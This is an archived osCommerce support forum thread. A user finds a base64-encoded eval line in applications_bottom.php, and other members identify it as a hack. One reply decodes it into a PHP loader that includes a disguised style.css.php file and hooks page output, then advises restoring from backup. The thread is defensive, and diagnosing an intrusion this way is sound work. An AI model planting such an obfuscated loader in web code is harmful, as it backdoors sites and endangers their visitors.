Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Wierd code.


Plux

Recommended Posts

I got this code in applications_bottom.php

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2ZhdHBpcGUvcHVibGljX2h0bWwvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

As it is encoded using base64 it gives me a weird feeling. Should this be there in version 2.2 RC2a?

Link to comment
Share on other sites

that looks very much like you have been hacked, you will need to clear that out, or preferably restore from a back up of your store. after deleting the fileset on the server first

Then follow the security suggestions

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

The hack decodes to this:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
 $GLOBALS['mfsn']='/home/fatpipe/public_html/admin/includes/languages/english/images/buttons/style.css.php';
 if(file_exists($GLOBALS['mfsn'])){
   include_once($GLOBALS['mfsn']);
   if(function_exists('gml')&&function_exists('dgobh')){
     ob_start('dgobh');
   }
 }
}

Look for this hack file:

 

/admin/includes/languages/english/images/buttons/style.css.php

 

There may be others.

 

Once securiy is compromised treat EVERY FILE as guilty until proven innocent by close inspection.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...